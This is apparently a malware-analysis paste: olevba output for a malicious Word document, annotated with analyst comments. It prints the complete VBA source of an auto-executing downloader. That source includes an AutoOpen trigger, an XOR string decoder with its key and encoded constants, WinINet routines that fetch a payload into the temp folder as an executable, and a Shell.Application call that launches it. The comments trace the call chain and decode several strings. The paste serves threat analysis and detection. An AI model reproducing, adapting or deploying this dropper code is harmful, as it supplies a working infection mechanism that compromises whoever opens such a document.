dynamoo

Malicious Word macro

Apr 30th, 2015
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- teleph~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: teleph~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: teleph~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  ' Thin wrapper: FELIX is never read; the body only forwards to JOSPEH (ELDRIDGE.bas).
  16. Sub COLTON(FELIX As Long)
  17. JOSPEH
  18. End Sub
  19.  
  ' Entry point. Word runs autoopen automatically when the document is opened (olevba flags it
  ' AutoExec below). Call chain visible in this listing:
  '   autoopen -> COLTON -> JOSPEH -> DOMINGO -> AUBREY -> DARELL -> LYNWOOD -> ANTIONE / MICHAL
  ' LYNWOOD builds a file path from a special folder, ANTIONE fetches a URL over WinINet and writes
  ' the response to that path, and MICHAL opens the written file through a CreateObject'd shell object.
  ' The literal 298 is not used by COLTON.
  20. Sub autoopen()
  21. COLTON (298)
  22. End Sub
  23.  
  24. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  25. ANALYSIS:
  26. +----------+----------+---------------------------------------+
  27. | Type     | Keyword  | Description                           |
  28. +----------+----------+---------------------------------------+
  29. | AutoExec | AutoOpen | Runs when the Word document is opened |
  30. +----------+----------+---------------------------------------+
  31. -------------------------------------------------------------------------------
  32. VBA MACRO ELDRIDGE.bas
  33. in file: teleph~1.doc - OLE stream: u'Macros/VBA/ELDRIDGE'
  34. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  35.  
  ' Second hop of the chain (autoopen -> COLTON -> JOSPEH -> DOMINGO). BERT is declared but never
  ' used, and the For loop only rewrites its own counter; both look like padding with no effect.
  36. Public Sub JOSPEH()
  37.         Dim BERT As Long
  38.  
  39.     Dim MARCELLUS As Long
  ' Loop body rewrites the loop counter; nothing reads MARCELLUS afterwards.
  40. For MARCELLUS = 5 To 11
  41. MARCELLUS = MARCELLUS * 3
  42. Next MARCELLUS
  43.  
  ' DOMINGO (FELTON.bas) ignores its Double argument.
  44. DOMINGO (8.2)
  45.  
  46. End Sub
  47.  
  ' Wrapper around the XOR decoder FRANKLYN (FELTON.bas): returns ENRIQUE (hex string) decoded with
  ' key TERRENCE. EDMUNDO is doubled but never read; callers pass literals, so the ByRef write has no
  ' visible effect. An identical PORTER is also defined in TUAN.bas.
  48. Public Function PORTER(EDMUNDO As Long, TERRENCE As String, ENRIQUE As String) As String
  49. EDMUNDO = EDMUNDO * 2
  50. PORTER = FRANKLYN(TERRENCE, ENRIQUE)
  51.    
  52. End Function
  53.  
  ' Builds the drop path, downloads the payload to it and then launches it. TITUS (ByRef) receives
  ' the special-folder object; HOMER is never read. Called from DARELL (MICHALE.bas).
  54. Public Function LYNWOOD(ByRef TITUS As Object, ByRef HOMER As Object) As Boolean
  55.  
  56. Dim RENALDO As Long
  ' JEWEL (TUAN.bas) CreateObject's the ProgID hidden in KRAIG (hand-decoded from this listing:
  ' Scripting.FileSystemObject -- verify); WARNER then calls GetSpecialFolder(2), which in the
  ' FileSystemObject enum is TemporaryFolder.
  57. Set TITUS = WARNER(JEWEL)
  58.  
  59. Dim JODY
  60.  
  61. Dim AMBROSE As String
  ' XOR-decodes JEROMY with key LEANDRO (hand-decoded: "\serebok2.exe" -- verify). 3213 is unused.
  62. AMBROSE = PORTER(3213, LEANDRO, JEROMY)
  63.  
  ' Loop only rewrites its own counter; filler.
  64. For RENALDO = 11 To 33
  65. RENALDO = RENALDO * 4
  66. Next RENALDO
  ' Folder object & file name -> full drop path (relies on the folder object's default property
  ' being its path -- confirm against the FileSystemObject Folder object).
  67. JODY = TITUS & AMBROSE
  68.  
  69.  
  ' ANTIONE (TUAN.bas) downloads to JODY; its Boolean result is discarded (empty If). 475 is unused.
  70. If ANTIONE(475, JODY) Then
  71. End If
  72.  
  73.  
  ' MICHAL (FELTON.bas) opens the dropped file. MICHAL never assigns its return value, so this
  ' function always returns False.
  74. LYNWOOD = MICHAL(TITUS, AMBROSE, 11)
  75.  
  76. End Function
  77.  
  ' One step of the XOR decoder: returns the character whose code is GAYLORD Xor MANUAL.
  ' Called once per byte by FRANKLYN (FELTON.bas). This is the ChrW/Xor pair olevba flags below.
  78. Public Function GASTON(ByRef GAYLORD As Integer, ByRef MANUAL As Integer) As String
  79.     GASTON = ChrW(GAYLORD Xor MANUAL)
  80. End Function
  81.  
  82.  
  ' Returns the next free file number (FreeFile). BRODNATHANIAL is never read; the caller in
  ' ANTIONE passes the literal "JERRY".
  83. Public Function LOWELL(BRODNATHANIAL As String) As Integer
  84.     LOWELL = FreeFile
  85. End Function
  86.  
  87. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  88. ANALYSIS:
  89. +------------+---------+-----------------------------------------+
  90. | Type       | Keyword | Description                             |
  91. +------------+---------+-----------------------------------------+
  92. | Suspicious | ChrW    | May attempt to obfuscate specific       |
  93. |            |         | strings                                 |
  94. | Suspicious | Xor     | May attempt to obfuscate specific       |
  95. |            |         | strings                                 |
  96. +------------+---------+-----------------------------------------+
  97. -------------------------------------------------------------------------------
  98. VBA MACRO FELTON.bas
  99. in file: teleph~1.doc - OLE stream: u'Macros/VBA/FELTON'
  100. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  101.  
  102.  
  ' Downloader configuration. The hex constants are byte-wise XOR-encoded with the key LEANDRO and
  ' are decoded at runtime by FRANKLYN (which consumes the key starting at its second character).
  ' Decoded values noted below were derived by hand from this listing; re-verify before relying on them.
  ' RUEBEN: size of the fixed-length receive buffer STACY in ANTIONE (TUAN.bas).
  103. Public Const RUEBEN = 5555
  ' STACYK: first argument (user-agent string) of InternetOpenA in WALLY (ZACKARY.bas).
  104. Public Const STACYK As String = "ARNOLDO"
  ' HARLAND: second argument (access type) of InternetOpenA; 1 is INTERNET_OPEN_TYPE_DIRECT.
  105. Public Const HARLAND = 1
  ' ELIJAH: flags argument of InternetOpenUrlA in CEDRICK; &H4000000 matches INTERNET_FLAG_NO_CACHE_WRITE.
  106. Public Const ELIJAH = &H4000000
  107.  
  ' HOBERT: ProgID passed to CreateObject in MICHAL (hand-decoded: Shell.Application).
  108. Public Const HOBERT = "1B293C22296D002222232551323C283620"
  ' JEROMY: file name appended to the special-folder path in LYNWOOD (hand-decoded: "\serebok2.exe").
  109. Public Const JEROMY = "14323C3C20212E396061294A36"
  ' JERRELL: URL passed to InternetOpenUrlA in CEDRICK (decoded value intentionally not reproduced here).
  110. Public Const JERRELL = "20352D3E7F6C6E3F3D3D3E5B203C2E373C23202C333E2A2F5A3C2133772137246E63667C630165706F3C3620"
  ' KRAIG: ProgID passed to CreateObject in JEWEL (hand-decoded: Scripting.FileSystemObject).
  111. Public Const KRAIG = "1B222B273537283C35610A5B3F2D12203D31262C1D3025295127"
  ' LEANDRO: the XOR key.
  112. Public Const LEANDRO = "SHAYNECARROL2"
  113.  
  114.  
  115.  
  116.  
  ' Third hop of the chain (JOSPEH -> DOMINGO -> AUBREY). SANTOS is never read, and AUBREY ignores
  ' the string it is given.
  117. Sub DOMINGO(SANTOS As Double)
  118.  
  119. AUBREY ("DEANGELOFILIBERTO")
  120. End Sub
  121.  
  122.  
  ' Returns ARLEN.GetSpecialFolder(2). LYNWOOD passes the object created by JEWEL; on a
  ' FileSystemObject, 2 selects TemporaryFolder.
  123. Public Function WARNER(ByRef ARLEN As Object) As Object
  124. Set WARNER = ARLEN.GetSpecialFolder(2)
  125. End Function
  126.  
  ' XOR string decoder used for every obfuscated constant. REYNALDO is a hex string (two characters
  ' per byte) and NATHANIAL is the key. For byte i (1-based): FRANCESCO (ZACKARY.bas) parses hex pair
  ' i, GILBERTO (TUAN.bas) returns the key character at ((i Mod Len(key)) + 1) -- so the key is
  ' consumed from its second character -- and GASTON (ELDRIDGE.bas) yields ChrW(byte Xor keychar).
  ' The decoded characters are concatenated and returned.
  127. Public Function FRANKLYN(NATHANIAL As String, REYNALDO As String) As String
  128.    
  129.     Dim GAYLORD As Integer
  130.     Dim MANUAL As Integer
  131.    
  132.    
  133.     Dim KRISTOFER As Integer
  ' Counter only takes the values 43 and 44, so the "End" is never executed; filler.
  134. For KRISTOFER = 43 To 44
  135. If KRISTOFER = 55 Then End
  136. Next KRISTOFER
  137.    
  138.     Dim CLAUD As Long
  139.     Dim TERENCE As String
  ' One iteration per hex pair (JORDON is Len).
  140.     For CLAUD = 1 To (JORDON(REYNALDO) / 2)
  141.         GAYLORD = FRANCESCO(REYNALDO, CLAUD)
  142.         MANUAL = GILBERTO(NATHANIAL, CLAUD)
  143.         TERENCE = TERENCE + GASTON(GAYLORD, MANUAL)
  144.     Next CLAUD
  145.    FRANKLYN = TERENCE
  146. End Function
  147.  
  ' Launches the dropped file: CreateObject on the ProgID hidden in HOBERT (hand-decoded from this
  ' listing: Shell.Application -- verify), then .Open on folder & file name. RAYFORD is never declared
  ' (implicit Variant; no Option Explicit is visible). CRISTOBAL is unused and the Boolean return value
  ' is never assigned, so the function always returns False.
  148. Public Function MICHAL(ByRef TITUS As Object, ByRef AMBROSE As String, CRISTOBAL As Double) As Boolean
  149. Dim SHERWOOD As String
  150. SHERWOOD = FRANKLYN(LEANDRO, HOBERT)
  151. Set RAYFORD = CreateObject(SHERWOOD)
  152. Dim RAYMON As Integer
  ' TITUS & AMBROSE is the same path ANTIONE wrote to (see LYNWOOD).
  153. RAYMON = RAYFORD.Open(TITUS & AMBROSE)
  154. End Function
  155.  
  ' Fourth hop of the chain (DOMINGO -> AUBREY -> DARELL). SANTIAGO is never read; DARELL is called
  ' with the expression 2, and the later LESLEY update has no effect. No return value is assigned.
  156. Public Function AUBREY(SANTIAGO As String)
  157. Dim LESLEY As Integer
  158. LESLEY = 1
  159. DARELL LESLEY * 2
  160. LESLEY = LESLEY + 4
  161. End Function
  162.  
  163.  
  164.  
  165.  
  166.  
  167.  
  168. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  169. ANALYSIS:
  170. +------------+--------------+-----------------------------------------+
  171. | Type       | Keyword      | Description                             |
  172. +------------+--------------+-----------------------------------------+
  173. | Suspicious | CreateObject | May create an OLE object                |
  174. | Suspicious | Open         | May open a file                         |
  175. | Suspicious | Hex Strings  | Hex-encoded strings were detected, may  |
  176. |            |              | be used to obfuscate strings (option    |
  177. |            |              | --decode to see all)                    |
  178. +------------+--------------+-----------------------------------------+
  179. -------------------------------------------------------------------------------
  180. VBA MACRO MICHALE.bas
  181. in file: teleph~1.doc - OLE stream: u'Macros/VBA/MICHALE'
  182. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  183.  
  ' Len wrapper: returns the character count of BRODNATHANIAL. Used by FRANKLYN, GILBERTO and ANTIONE.
  184. Public Function JORDON(BRODNATHANIAL As String) As Long
  185. JORDON = Len(BRODNATHANIAL)
  186. End Function
  187.  
  188.  
  ' Fifth hop of the chain (AUBREY -> DARELL -> LYNWOOD). DORSEY is only incremented, never read.
  ' The local PORTER is an Object variable (it shadows the PORTER function name inside this body)
  ' that LYNWOOD fills through its ByRef TITUS parameter; HAI is passed but LYNWOOD never reads it.
  189. Public Function DARELL(DORSEY As Double)
  190.  
  191. Dim PORTER As Object
  192.  
  193.  
  194.     Dim ELDEN As Long
  ' Both ELDEN loops rewrite their own counter; filler.
  195. For ELDEN = 14 To 15
  196. ELDEN = ELDEN + 15
  197. Next ELDEN
  198.    
  199.  
  200. Dim HAI  As Object
  201.  
  202.  
  203. For ELDEN = 10 To 20
  204. ELDEN = ELDEN + 60
  205. Next ELDEN
  206.    
  207.  
  ' JEWEL (TUAN.bas) returns CreateObject(decoded KRAIG).
  208. Set HAI = JEWEL
  209. ELDEN = ELDEN + 5
  210. Dim LINDSAY As Boolean
  211.  
  ' ELDEN is positive here, so the condition is never true; filler.
  212. If ELDEN > ELDEN * 100 Then End
  ' LYNWOOD (ELDRIDGE.bas) performs the download and launch; its result is stored and never used.
  213. LINDSAY = LYNWOOD(PORTER, HAI)
  214. DORSEY = DORSEY + 24
  215. End Function
  216.  
  217.  
  218. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  219. ANALYSIS:
  220. No suspicious keyword or IOC found.
  221. -------------------------------------------------------------------------------
  222. VBA MACRO TUAN.bas
  223. in file: teleph~1.doc - OLE stream: u'Macros/VBA/TUAN'
  224. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  225.  
  226.  
  ' Key-stream helper for FRANKLYN: returns the character code of the key NATHANIAL at position
  ' ((CLAUD Mod Len(key)) + 1). The modulo wraps around the key; because CLAUD starts at 1, the first
  ' byte is paired with the key's second character.
  227. Public Function GILBERTO(ByRef NATHANIAL As String, ByRef CLAUD As Long) As Integer
  228. GILBERTO = AscW(DANILO(17, NATHANIAL, ((CLAUD Mod JORDON(NATHANIAL)) + 1), 1))
  229. End Function
  230.  
  231.  
  232.  
  233.  
  ' Opens the download URL. GRADY (ByRef) receives the WinINet request handle; NOAH is the session
  ' handle from WALLY. The signature switches to LongPtr on 64-bit Office. Always returns True --
  ' the caller (ANTIONE) checks the handle in GRADY instead of this result.
  234. #If VBA7 And Win64 Then
  235.        Public Function CEDRICK(ByRef GRADY As LongPtr, NOAH As LongPtr) As Boolean
  236.     #Else
  237.        Public Function CEDRICK(ByRef GRADY As Long, NOAH As Long) As Boolean
  238.     #End If
  239.         Dim PHIL As Double
  240. Dim GUADALUPE As String
  241. Dim CLARK As Long
  ' XOR-decodes JERRELL with key LEANDRO into the URL (decoded value not reproduced here). 321 is unused.
  242.     GUADALUPE = PORTER(321, LEANDRO, JERRELL)
  243.  
  ' Loop rewrites its own counter; filler.
  244. For PHIL = 14 To 18
  245. PHIL = PHIL + 2.1
  246. Next PHIL
  ' LUIGI is InternetOpenUrlA (ZACKARY.bas): (session, url, headers = vbNullString, headers length = 0,
  ' flags = ELIJAH, context = 0).
  247.     GRADY = LUIGI(NOAH, GUADALUPE, vbNullString, 0, ELIJAH, 0)
  248.     CEDRICK = True
  249. End Function
  250.  
  ' Returns CreateObject(decoded KRAIG); the ProgID hand-decoded from this listing is
  ' Scripting.FileSystemObject (verify). Called from LYNWOOD (via WARNER) and DARELL.
  251. Public Function JEWEL() As Object
  252. Dim ISMAEL As String
  253. ISMAEL = FRANKLYN(LEANDRO, KRAIG)
  254. Set JEWEL = CreateObject(ISMAEL)
  255. End Function
  256.  
  ' Duplicate of the PORTER in ELDRIDGE.bas: decodes ENRIQUE (hex) with key TERRENCE via FRANKLYN.
  ' EDMUNDO is doubled but never read. Which of the two identical copies resolves a call is not
  ' determinable from this listing, and it does not matter since the bodies are the same.
  257. Public Function PORTER(EDMUNDO As Long, TERRENCE As String, ENRIQUE As String) As String
  258. EDMUNDO = EDMUNDO * 2
  259. PORTER = FRANKLYN(TERRENCE, ENRIQUE)
  260.    
  261. End Function
  262.  
  ' Download routine: fetches the URL decoded in CEDRICK and writes the response to the file path
  ' MALCOM (LYNWOOD passes special-folder path & file name). KOREY is never read. Returns True only
  ' when at least one character was received. CRISTOPHER and CORTEZ are never declared (no Option
  ' Explicit is visible), so they are implicit Variants. MILES, MICAH and LUCAS are declared but unused.
  ' Detection angle: the document process opens a WinINet session and writes a binary file to a
  ' special folder; the written file is then opened by MICHAL.
  263. Public Function ANTIONE(KOREY As Double, ByVal MALCOM As String) As Boolean
  264.    
  265.         Dim LAMONT As Long
  ' STACY is a fixed-length receive buffer of RUEBEN (5555) characters; GARLAND accumulates the response.
  266.     Dim STACY As String * RUEBEN, GARLAND As String
  267.     Dim MILES As Integer, MICAH As Double
  268.     #If VBA7 And Win64 Then
  269.         Dim KASEY As LongPtr, BENTON As LongPtr
  270.     #Else
  271.         Dim KASEY As Long, BENTON As Long
  272.     #End If
  273.  
  ' WALLY (ZACKARY.bas) wraps InternetOpenA; 0 means no session handle, so give up.
  274.     KASEY = WALLY
  275.     If KASEY = 0 Then
  276.         Exit Function
  277.     End If
  278.     Dim LUCAS As Boolean
  279.    
  ' CEDRICK opens the URL and stores the request handle in BENTON (ByRef). Its Boolean result is
  ' unconditionally True and is ignored; the handle is tested on the next line instead.
  280.     If CEDRICK(BENTON, KASEY) Then
  281.     End If
  282.     If BENTON = 0 Then
  283.         CRISTOPHER = 0
  284.     Else
  ' KENETH is InternetReadFile: fills STACY and returns the byte count in LAMONT.
  285.         KENETH BENTON, STACY, RUEBEN, LAMONT
  ' NOTE(review): the whole fixed-length buffer is copied here rather than LAMONT characters, unlike
  ' the loop below; a first read shorter than RUEBEN would leave buffer padding in the written file.
  286.         GARLAND = STACY
  287.           Dim BOYCE As Integer
  288.           BOYCE = 0
  289.           BOYCE = BOYCE + 33
  ' 33 > 73 is never true; filler.
  290. If BOYCE > BOYCE + 40 Then End
  ' Keep reading until InternetReadFile reports 0 bytes.
  291.         Do While LAMONT <> 0
  292.             KENETH BENTON, STACY, RUEBEN, LAMONT
  293.                     GARLAND = GARLAND + Mid(STACY, 1, LAMONT)
  294.         Loop
  ' CRISTOPHER = number of characters received (JORDON is Len); CORTEZ = a free file number (LOWELL wraps FreeFile).
  295.              CRISTOPHER = JORDON(GARLAND): _
  296.              CORTEZ = LOWELL("JERRY")
  ' Write the received data to MALCOM as a raw binary file (olevba flags Open/Write/Put/Binary below).
  297.         Open MALCOM For Binary Access Write Lock Write As #CORTEZ
  298.         Put #CORTEZ, , GARLAND
  299.         BOYCE = BOYCE + 46
  ' BOYCE is 79 here, so never true; filler.
  300.     If BOYCE < 0 Then End
  301.         Close #CORTEZ
  302.     End If
  ' GRAIG is InternetCloseHandle: close the request handle, then the session handle.
  303.     GRAIG BENTON
  304.     GRAIG KASEY
  305.     GARLAND = ""
  306.     If CRISTOPHER Then
  307.         ANTIONE = True
  308.     End If
  309. End Function
  310.  
  311.  
  312.  
  313. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  314. ANALYSIS:
  315. +------------+--------------+-----------------------------------------+
  316. | Type       | Keyword      | Description                             |
  317. +------------+--------------+-----------------------------------------+
  318. | Suspicious | CreateObject | May create an OLE object                |
  319. | Suspicious | Open         | May open a file                         |
  320. | Suspicious | Write        | May write to a file (if combined with   |
  321. |            |              | Open)                                   |
  322. | Suspicious | Put          | May write to a file (if combined with   |
  323. |            |              | Open)                                   |
  324. | Suspicious | Binary       | May read or write a binary file (if     |
  325. |            |              | combined with Open)                     |
  326. +------------+--------------+-----------------------------------------+
  327. -------------------------------------------------------------------------------
  328. VBA MACRO ZACKARY.bas
  329. in file: teleph~1.doc - OLE stream: u'Macros/VBA/ZACKARY'
  330. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  331.  
  332.  
  333.  
  334.  
  ' SPORTER is not referenced anywhere in this listing.
  335. Public Const SPORTER = "JOHN"
  336.  
  ' WinINet imports under renamed procedure names (Alias carries the real export name):
  '   GRAIG   = InternetCloseHandle
  '   WINFORD = InternetOpenA
  '   KENETH  = InternetReadFile
  '   LUIGI   = InternetOpenUrlA
  ' The 64-bit branch uses PtrSafe/LongPtr. In that branch each keyword sits on its own line joined
  ' by "_" continuations, which looks intended to defeat single-line "Declare ... Lib" pattern
  ' matching (olevba still reports the Lib keyword and the wininet.dll IOC below).
  337. #If VBA7 And Win64 Then
  338. Public _
  339. Declare _
  340. PtrSafe _
  341. Function _
  342. GRAIG Lib _
  343. "wininet.dll" Alias "InternetCloseHandle" (ByRef RICHARD As LongPtr) As Long
  344. Public _
  345. Declare _
  346. PtrSafe _
  347. Function _
  348. WINFORD Lib _
  349. "wininet.dll" Alias "InternetOpenA" (ByVal GARLAND As String, ByVal MALCOMPH As Long, ByVal THOMAS As String, ByVal FRANCESCOTOPHER As String, ByVal DANIEL As Long) As LongPtr
  350. Public _
  351. Declare _
  352. PtrSafe _
  353. Function _
  354. KENETH Lib _
  355. "wininet.dll" Alias "InternetReadFile" (ByVal PAUL As LongPtr, ByVal STACY As String, ByVal DONALD As Long, GEORGE As Long) As Integer
  356. Public _
  357. Declare _
  358. PtrSafe _
  359. Function _
  360. LUIGI Lib _
  361. "wininet.dll" Alias "InternetOpenUrlA" (ByVal KENNETH As LongPtr, ByVal TERENCEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As LongPtr
  362. #Else
  ' 32-bit declarations: same four exports with Long handles.
  363. Public Declare Function GRAIG Lib "wininet.dll" _
  364. Alias "InternetCloseHandle" (ByRef RICHARD As Long) As Long
  365. Public Declare Function WINFORD Lib "wininet.dll" _
  366. Alias "InternetOpenA" (ByVal GARLAND As String, ByVal MALCOMPH As Long, ByVal THOMAS As String, ByVal FRANCESCOTOPHER As String, ByVal DANIEL As Long) As Long
  367. Public Declare Function KENETH Lib "wininet.dll" _
  368. Alias "InternetReadFile" (ByVal PAUL As Long, ByVal STACY As String, ByVal DONALD As Long, GEORGE As Long) As Integer
  369. Public Declare Function LUIGI Lib "wininet.dll" _
  370. Alias "InternetOpenUrlA" (ByVal KENNETH As Long, ByVal TERENCEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As Long
  371. #End If
  372.  
  373.  
  ' Hex-pair reader for FRANKLYN: takes characters (2*CLAUD-1, 2) of REYNALDO (MODESTO gives the
  ' start, DANILO wraps Mid$) and parses them as a hex byte via Val("&H..").
  374. Public Function FRANCESCO(ByRef REYNALDO As String, ByRef CLAUD As Long) As Integer
  375.  FRANCESCO = Val("&H" & (DANILO(12, REYNALDO, MODESTO(CLAUD), 2)))
  376. End Function
  ' Maps a 1-based byte index to the 1-based start position of its hex pair: 2*CLAUD - 1.
  377. Public Function MODESTO(ByRef CLAUD As Long) As Long
  378.  MODESTO = (2 * CLAUD) - 1
  379. End Function
  380.  
  381.  
  ' Mid$ wrapper: returns MANUAL characters of BRODNATHANIAL starting at GAYLORD. SAMMY is
  ' incremented but never read; callers pass literals (12, 17).
  382. Public Function DANILO(SAMMY As Long, ByRef BRODNATHANIAL As String, ByRef GAYLORD As Integer, ByRef MANUAL As Integer) As String
  383.     DANILO = Mid$(BRODNATHANIAL, GAYLORD, MANUAL)
  384.     SAMMY = SAMMY + 52
  385. End Function
  ' Opens the WinINet session. WINFORD is InternetOpenA (ZACKARY.bas), called with
  ' (agent = STACYK, access type = HARLAND, proxy = vbNullString, proxy bypass = vbNullString, flags = 0).
  ' Returns the session handle (LongPtr on 64-bit Office); ANTIONE treats 0 as failure.
  386. #If VBA7 _
  387.     And Win64 Then
  388. Public Function WALLY() As LongPtr
  389.  #Else
  390. Public Function WALLY() As Long
  391.  
  392.  #End If
  393.  
  394.  WALLY = WINFORD(STACYK, HARLAND, vbNullString, vbNullString, 0)
  395. End Function
  396.  
  397.  
  398.  
  399.  
  400.  
  401.  
  402. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  403. ANALYSIS:
  404. +------------+----------------+-----------------------------------------+
  405. | Type       | Keyword        | Description                             |
  406. +------------+----------------+-----------------------------------------+
  407. | Suspicious | Lib            | May run code from a DLL                 |
  408. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  409. |            |                | may be used to obfuscate strings        |
  410. |            |                | (option --decode to see all)            |
  411. | IOC        | wininet.dll    | Executable file name                    |
  412. +------------+----------------+-----------------------------------------+